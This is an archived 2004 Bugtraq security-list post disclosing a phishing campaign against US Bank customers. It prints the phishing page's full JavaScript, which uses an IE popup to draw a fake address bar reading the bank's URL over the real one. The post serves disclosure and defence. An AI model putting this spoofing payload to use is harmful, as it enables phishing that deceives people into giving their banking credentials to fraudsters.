lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <81637804AB36A644BBDE3ED9DD4E73FDF6DB15@hermes.eCompany.gov>
Date: Thu, 13 May 2004 15:30:29 -0700
From: "Drew Copley" <dcopley@...e.com>
To: <bugtraq@...urityfocus.com>
Subject: IE URL Issue Being Used In Phishing In the Wild [USBank]


One of our developers (Laurentiu Nicula) received an alarming type
of phishing attack today.

received: from UsBank.com ([82.33.97.75]) 

[82.33.97.75 = [ 82-33-97-75.cable.ubr10.azte.blueyonder.co.uk ]

The email looks legitimate enough, but links to:

http://validation-required.info/

The webpage attempts to throw up a little url bar of it's own
which covers IE's url bar. This allows a pretty convincing spoof
job to happen. 

The pop up looks just like IE's url bar, and it is even selectable.

This does not work in Netscape.

It is very similiar to Malware's issues of late. 

He protected the source pretty well, but it reveals some interesting
code which I googled to some Italian guy here (post made in December
of last year):

http://tool.freeonline.it/forum/read.php?f=8&i=361&t=361

Here is the vulnerable code page:

HTTP/1.1 200 OK
Date: Thu, 13 May 2004 22:19:10 GMT
Server: Apache/1.3.29 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2
mod_bwlimited/1.4 PHP/4.3.3 FrontPage/5.0.2.2634 mod_ssl/2.8.16
OpenSSL/0.9.7a
Last-Modified: Wed, 12 May 2004 03:47:59 GMT
ETag: "1da80c8-388-40a19e6f"
Accept-Ranges: bytes
Content-Length: 904
Keep-Alive: timeout=15, max=95
Connection: Keep-Alive
Content-Type: text/html

var vuln_x, vuln_y, vuln_w, vuln_h;
function vuln_calc() {
var root= document[
(document.compatMode=='CSS1Compat') ?
'documentElement' : 'body'
];
vuln_x= window.screenLeft+72;
vuln_y= window.screenTop-20;
vuln_w= root.offsetWidth-520;
vuln_h= 17;
vuln_show();
}

var vuln_win;
function vuln_pop() {
vuln_win= window.createPopup();
vuln_win.document.body.innerHTML= vuln_html;
vuln_win.document.body.style.margin= 0;
vuln_win.document.body.onunload= vuln_pop;
vuln_show();
}

function vuln_show() {
if (vuln_win)
vuln_win.show(vuln_x, vuln_y, vuln_w, vuln_h);
}

var vuln_html= '\x3Cdiv style="height: 100%; line-height: 17px;
font-family: \'Tahoma\', sans-serif; font-size:
8pt;">https://www.usbank.com/secure/-run\x3C/div>'




Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ